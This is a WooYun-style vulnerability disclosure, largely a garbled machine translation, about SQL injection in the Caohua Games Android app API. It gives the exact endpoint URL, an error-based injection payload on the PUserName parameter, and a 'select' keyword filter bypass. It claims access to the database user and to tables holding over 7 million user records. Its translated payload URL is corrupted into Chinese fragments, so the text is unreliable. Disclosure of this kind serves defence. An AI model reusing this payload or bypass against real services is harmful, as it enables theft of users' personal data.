草花游戏官方APP存在SQL注入(涉及700W+用户数据/800W+设备信息)

漏洞标题 草花游戏官方APP存在SQL注入(涉及700W+用户数据/800W+设备信息) 相关厂商 caohua.com 漏洞作者 路人甲 提交时间 2016-05-05 09:21 公开时间 201…

漏洞标题 草花游戏官方APP存在SQL注入(涉及700W +用户数据/800W +设备信息) 相关制造商 Caohua.com 漏洞作者 过路人 提交时间 2016-05-05 09: 21 公共时间 2016-06-19 11: 40 漏洞类型 SQL注入漏洞 危险等级 高 自我评估等级 20 漏洞状态 制造商已确认 标签标签 SQL注入 漏洞详细信息 目标:草花游戏Android APP 测试发现在以下位置有SQL注入:(注入参数PUserName,错误注入) http://switch.api.caohua.com/Api/CheckSalf.ashx?DeviceNo=B30FE6BC79CA96D418E41790D80A8E1B&Times=1462374589&UserID=639&AppID=133&PUserName=374587368&SourceID=576&Sign=C92A3457E748E4813A7B3AAD294595FA 有效载荷: http://switch.api.caohua.com/Api/CheckSalf.ashx?DeviceNo=B30FE6BC79CA96D418E41790D80A8E1B&Times=1462374589&UserID=639&AppID=133&PUserName=374587368%27%20AND%203750=CONVERT%28INT,user%29%20 - %20%20-&安培;的SourceID=576安培;符号=C92A3457E748E4813A7B3AAD294595FA 由于选择被过滤,因此可以绕过编码 选择 - >%u0073elect 漏洞证明: 1,当前数据库用户

2,所有数据库

3,用户表,涉及700W +用户数据/800W +设备信息,具体不深〜

修理计划: 请多指教〜 版权声明:请注明出处。居民A @乌云